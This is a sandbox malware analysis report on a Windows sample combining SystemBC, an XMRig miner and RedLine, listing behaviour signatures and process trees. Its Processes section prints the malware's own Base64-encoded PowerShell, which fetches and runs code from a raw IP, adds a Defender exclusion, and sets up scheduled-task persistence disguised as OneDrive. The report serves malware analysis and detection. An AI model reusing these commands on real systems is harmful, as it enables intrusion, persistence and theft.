Malware Analysis Report

2025-04-03 09:40

Sample ID 230504-m8mdqadf8s
Target file
SHA256 d540f75897495102dd30eaa924623ac40415e8a716bdcbadf7d7c9a00feb5c97
Tags
systembc xmrig evasion miner persistence trojan redline [ pro ] infostealer spyware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

d540f75897495102dd30eaa924623ac40415e8a716bdcbadf7d7c9a00feb5c97

Threat Level: Known bad

The file file was found to be: Known bad.

Malicious Activity Summary

systembc xmrig evasion miner persistence trojan redline [ pro ] infostealer spyware

xmrig

SystemBC

Suspicious use of NtCreateUserProcessOtherParentProcess

RedLine

Identifies VirtualBox via ACPI registry values (likely anti-VM)

XMRig Miner payload

Downloads MZ/PE file

Blocklisted process makes network request

Checks BIOS information in registry

Executes dropped EXE

Loads dropped DLL

Checks computer location settings

Identifies Wine through registry keys

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Looks up external IP address via web service

Drops file in System32 directory

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

Enumerates physical storage devices

Suspicious behavior: AddClipboardFormatListener

Suspicious use of SetWindowsHookEx

Delays execution with timeout.exe

Checks processor information in registry

Suspicious behavior: LoadsDriver

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Creates scheduled task(s)

Suspicious use of FindShellTrayWindow

Suspicious use of SendNotifyMessage

Uses Task Scheduler COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-05-04 11:08

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-05-04 11:08

Reported

2023-05-04 11:10

Platform

win7-20230220-en

Max time kernel

136s

Max time network

139s

Command Line

C:\Windows\Explorer.EXE

Signatures

SystemBC

trojan systembc

xmrig

miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Roaming\dllhost.exe N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\dllhost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\dllhost.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Wine C:\Users\Admin\AppData\Roaming\dllhost.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\ProgramData\\lsass\\lsass.exe" C:\Users\Admin\AppData\Roaming\lsass.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 844 set thread context of 1880 N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe C:\Windows\System32\conhost.exe
PID 844 set thread context of 2040 N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe C:\Windows\System32\conhost.exe

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\ProgramData\lsass\lsass.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\dllhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\lsass.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\lsass\lsass.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\lsass.exe N/A
N/A N/A C:\ProgramData\lsass\lsass.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1584 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1584 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1584 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1584 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1584 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1584 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1584 wrote to memory of 576 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1584 wrote to memory of 576 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1584 wrote to memory of 576 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1584 wrote to memory of 1764 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1584 wrote to memory of 1764 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1584 wrote to memory of 1764 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 576 wrote to memory of 1456 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\OneDrive.exe
PID 576 wrote to memory of 1456 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\OneDrive.exe
PID 576 wrote to memory of 1456 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\OneDrive.exe
PID 576 wrote to memory of 1736 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 576 wrote to memory of 1736 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 576 wrote to memory of 1736 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 576 wrote to memory of 1736 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 1016 wrote to memory of 700 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1016 wrote to memory of 700 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1016 wrote to memory of 700 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1016 wrote to memory of 1236 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1016 wrote to memory of 1236 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1016 wrote to memory of 1236 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1016 wrote to memory of 1384 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1016 wrote to memory of 1384 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1016 wrote to memory of 1384 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1016 wrote to memory of 1880 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1016 wrote to memory of 1880 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1016 wrote to memory of 1880 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1544 wrote to memory of 2040 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 1544 wrote to memory of 2040 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 1544 wrote to memory of 2040 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 576 wrote to memory of 1004 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 576 wrote to memory of 1004 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 576 wrote to memory of 1004 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 576 wrote to memory of 1004 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 1160 wrote to memory of 844 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
PID 1160 wrote to memory of 844 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
PID 1160 wrote to memory of 844 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
PID 1512 wrote to memory of 1672 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1512 wrote to memory of 1672 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1512 wrote to memory of 1672 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1512 wrote to memory of 1516 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1512 wrote to memory of 1516 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1512 wrote to memory of 1516 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1512 wrote to memory of 536 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1512 wrote to memory of 536 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1512 wrote to memory of 536 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1832 wrote to memory of 1680 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 1832 wrote to memory of 1680 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 1832 wrote to memory of 1680 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 1512 wrote to memory of 580 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1512 wrote to memory of 580 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1512 wrote to memory of 580 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 844 wrote to memory of 1880 N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe C:\Windows\System32\conhost.exe
PID 844 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe C:\Windows\System32\conhost.exe
PID 1004 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 1004 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 1004 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 1004 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 1004 wrote to memory of 1860 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\ProgramData\lsass\lsass.exe
PID 1004 wrote to memory of 1860 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\ProgramData\lsass\lsass.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\file.exe

"C:\Users\Admin\AppData\Local\Temp\file.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBmAGkAbABlAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBvAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwByAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Users\Admin\AppData\Roaming\OneDrive.exe

"C:\Users\Admin\AppData\Roaming\OneDrive.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Users\Admin\AppData\Roaming\dllhost.exe

"C:\Users\Admin\AppData\Roaming\dllhost.exe"

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn OneDrive /tr 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe'

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "OneDrive"

C:\Windows\system32\taskeng.exe

taskeng.exe {F7113E20-63A3-4384-81A5-862A8DC28CCA} S-1-5-21-3499517378-2376672570-1134980332-1000:MLXLFKOI\Admin:Interactive:[1]

C:\Users\Admin\AppData\Roaming\lsass.exe

"C:\Users\Admin\AppData\Roaming\lsass.exe"

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

